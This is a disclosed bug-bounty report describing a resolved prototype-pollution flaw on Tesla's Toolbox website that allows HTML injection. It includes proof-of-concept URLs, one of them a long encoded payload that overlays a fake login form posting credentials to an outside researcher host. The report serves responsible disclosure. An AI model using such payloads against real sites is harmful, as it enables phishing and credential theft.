Summary by BlackFan
Toolbox website uses the backbone.queryparams.js script which is vulnerable to Prototype Pollution.
Using the existing js code, it is possible to add arbitrary HTML to the page (but inline js is blocked by the CSP).
[toolbox.teslamotors.com] HTML Injection via Prototype Pollution / Potential XSS
Disclosed by
- Engagement Tesla
- Disclosed date over 4 years ago
- Reward $200
- Priority P4 Bugcrowd's VRT priority rating
- Status Resolved This vulnerability has been accepted and fixed
Report details
-
Submitted
-
Target Location
*.teslamotors.com -
Target category
Web App
-
VRT
Server-Side Injection > Content Spoofing > iframe Injection -
Priority
P4 -
Bug URL
https://toolbox.teslamotors.com/ -
Description
Toolbox website uses the backbone.queryparams.js script which is vulnerable to Prototype Pollution.
For example:
- Open URL
https://toolbox.teslamotors.com/?__proto__.VULN=PROTOTYPE_POLLUTION - Check in the console that Object.prototype.VULN was created
Using this, an attacker can change the logic of scripts that are executed next. For example, make HTML Injection (in fact, this is XSS, but the site has a strict Content-Security-Policy).
HTML Injection PoC:
https://toolbox.teslamotors.com/?__proto__.id=1&__proto__.id=1&__proto__.username=1&__proto__.username=1&&__proto__.display_name=%3Cmarquee%3E&__proto__.display_name=1PoC with Fake Login page via fullscreen iframe:
https://toolbox.teslamotors.com/?__proto__.id=1&__proto__.id=1&__proto__.username=1&__proto__.username=1&__proto__.display_name=%3Ciframe/srcdoc=%27%3Chtml%20lang=%22en%22%3E%3Chead%3E%3Cbase%20href=%22https://toolbox.teslamotors.com/%22/%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/jquery-ui.min.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/dataTables.bootstrap.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/dataTables.tableTools.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/dataTables.scroller.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap-dialog.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap-select.min.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap-editable.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/font-awesome.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/tbxweb.css%22%3E%3C/head%3E%3Cbody%3E%3Cdiv%20id=%22body%22%3E%3Cdiv%20id=%22banner-layout%22%3E%3C/div%3E%3Cdiv%20id=%22main-menu%22%3E%3Cnav%20class=%22navbar%20navbar-default%20navbar-static-top%22role=%22navigation%22style=%22margin-bottom:0px%22%3E%3Cdiv%20class=%22container%22%3E%3Cdiv%20class=%22navbar-header%22%3E%3Cbutton%20type=%22button%22class=%22navbar-toggle%20collapsed%22data-toggle=%22collapse%22data-target=%22%23navbar%22aria-expanded=%22false%22aria-controls=%22navbar%22%3E%3Cspan%20class=%22sr-only%22%3EToggle%20navigation%3C/span%3E%3Cspan%20class=%22icon-bar%22%3E%3C/span%3E%3Cspan%20class=%22icon-bar%22%3E%3C/span%3E%3Cspan%20class=%22icon-bar%22%3E%3C/span%3E%3C/button%3E%3Ca%20class=%22navbar-brand%22href=%22/%22style=%22padding-top:%200px;%20padding-left:%205px%22%3E%3Cimg%20style=%22height:75px%22alt=%22Brand%22src=%22/assets/images/tesla_flag.png%22%3E%3C/a%3E%3Ca%20class=%22navbar-brand%22style=%22font-size:%2023px%22href=%22/%22%3EToolbox%3C/a%3E%3C/div%3E%3Cdiv%20id=%22navbar%22class=%22navbar-collapse%20collapse%22%3E%3Cul%20class=%22nav%20navbar-nav%22%3E%3Cli%20class=%22dropdown%22%3E%3Ca%20href=%22/software/download%22class=%22dropdown-toggle%22role=%22button%22aria-expanded=%22false%22%3ESoftware%20%3Cspan%20class=%22caret%22%3E%3C/span%3E%3C/a%3E%3Cul%20class=%22dropdown-menu%22role=%22menu%22%3E%3Cli%3E%3Ca%20href=%22/software/download%22%3EDownload%3C/a%3E%3C/li%3E%3C/ul%3E%3C/li%3E%3C/ul%3E%3Cdiv%20id=%22search-form%22class=%22navbar-form%20navbar-left%22%3E%3C/div%3E%3Cdiv%20id=%22user-nav%22class=%22nav%20navbar-nav%20navbar-right%22%3E%3Cdiv%3E%3Cul%20class=%22nav%20navbar-nav%20navbar-right%22%3E%3Cli%3E%3Cspan%20class=%22glyphicon%20glyphicon-user%22aria-hidden=%22true%22%3E%3C/span%3E%20Login%20/%20Register%3C/a%3E%3C/li%3E%3C/ul%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/nav%3E%3C/div%3E%3Cdiv%20id=%22contents%22%3E%3Cdiv%3E%3Cdiv%20id=%22content%22class=%22container%22%3E%3Cform%20target=_parent%20action=//blackfan.ru/fk%20class=%22form-signin%22role=%22form%22%3E%3Ch2%20class=%22form-signin-heading%22%3E%3Cfont%20color=%22red%22%3E%3Cb%3EFAKE%3C/b%3E%3C/font%3E%20Toolbox%20Online%20Portal%20(External%20Site)%3C/h2%3E%3Cp%20id=%22error-text%22class=%22help-block%22%3E%3C/p%3E%3Cdiv%20class=%22form-group%22%3E%3Cinput%20id=%22username%22name=%22login%22class=%22form-control%20login-control%22placeholder=%22username%22autofocus=%22%22%3E%3Cinput%20id=%22password%22name=%22password%22type=%22password%22class=%22form-control%20login-control%22placeholder=%22password%22%3E%3C/div%3E%3Cdiv%20id=%22captcha-container%22%3E%3C/div%3E%3Cbutton%20id=%22login-btnx%22type=%22submit%22class=%22btn%20btn-default%20btn-block%22%3ESign%20in%3C/button%3E%3C/form%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/body%3E%3C/html%3E%27/style=%22position:fixed;top:0;left:0;bottom:0;right:0;width:100%25;height:100%25;border:none;margin:0;padding:0;overflow:hidden;z-index:999999;%22%3E%3C/iframe%3E&__proto__.display_name=1 - Open URL
Activity
- Nick Customer published the disclosure report
- BlackFan requested disclosure
- Nick Customer sent a message
- Nick Customer rewarded BlackFan $200
- Nick Customer changed the state to Resolved
- Nick Customer rewarded BlackFan 5 points
- Nick Customer sent a message
- Nick Customer changed the severity to P4
- Nick Customer updated VRT to Server-Side Injection > Content Spoofing > iframe Injection
- Nick Customer changed the state to Triaged
- Nick Customer changed the severity to P4
- BlackFan sent a message
- BlackFan created the submission
